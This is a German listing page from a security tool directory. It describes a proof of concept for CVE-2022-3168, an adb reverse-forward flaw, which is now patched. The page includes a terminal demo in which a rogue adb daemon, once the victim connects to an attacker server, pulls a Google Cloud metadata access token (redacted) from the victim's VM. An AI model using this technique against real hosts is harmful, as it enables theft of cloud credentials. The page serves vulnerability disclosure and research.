Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-3168-adb-unexpected-reverse-forwards — Proof-of-Concept-Code zur Ausnutzung eines Fehlers in adb, der das Öffnen von Netzwerkverbindungen auf dem Host zu beliebigen Zielen erlaubte | Kitploit
Tools/GitHubGitHub/irsl/cve-2022-3168-adb-unexpected-reverse-forwards
Android-SicherheitSchwachstellenanalyseExploitationPenetrationstestsMobile SicherheitRed Teaming
GitHubirsl/cve-2022-3168-adb-unexpected-reverse-forwards

CVE-2022-3168-adb-unexpected-reverse-forwards

Proof-of-Concept-Code zur Ausnutzung eines Fehlers in adb, der das Öffnen von Netzwerkverbindungen auf dem Host zu beliebigen Zielen erlaubte

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
31vor 3 JahrenNoch nicht geprüft

Die Reverse-Tunnel-Funktion in Android Debug Bridge (adb) war anfällig, da sie es bösartigen adb-Daemons erlaubte, Verbindungen zu beliebigen Hosts/Ports und Unix-Domain-Sockets auf dem Host zu öffnen.

Fenster des Angreifers (wo der schädliche Daemon läuft):

root@kitploit:~
$ ./adb_rogue_daemon.py

Fenster des Opfers (in diesem Beispiel eine GCE-VM):

root@kitploit:~
$ adb connect serverip:5556
connected to 8.tcp.ngrok.io:19076

Fenster des Angreifers:

root@kitploit:~
...
Wooho, we got response for our rouge request!
b'HTTP/1.0 200 OK\r\nMetadata-Flavor: Google\r\nContent-Type: application/json\r\nDate: Thu, 04 Nov 2021 22:31:21 GMT\r\nServer: Metadata Server for VM\r\nConnection: Close\r\nContent-Length: 1049\r\nX-XSS-Protection: 0\r\nX-Frame-Options: SAMEORIGIN\r\n\r\n{"access_token":"ya29.c.KpgBFghLV[redacted].....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................'
<<< b'...................................................................................................................................................................................................................................................","expires_in":2394,"token_type":"Bearer"}CLSE\x08\x00\x00\x00\xd2\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbc\xb3\xac\xba'
b'...................................................................................................................................................................................................................................................","expires_in":2394,"token_type":"Bearer"}CLSE\x08\x00\x00\x00\xd2\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbc\xb3\xac\xba'
('....', (774778414, 774778414, 774778414, 774778414, 774778414), b'...........................................................................................................................................................................................................................","expires_in":2394,"token_type":"Bearer"}CLSE\x08\x00\x00\x00\xd2\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbc\xb3\xac\xba')

Dies wurde in Platform Tools 33.0.3 behoben.

Tool herunterladen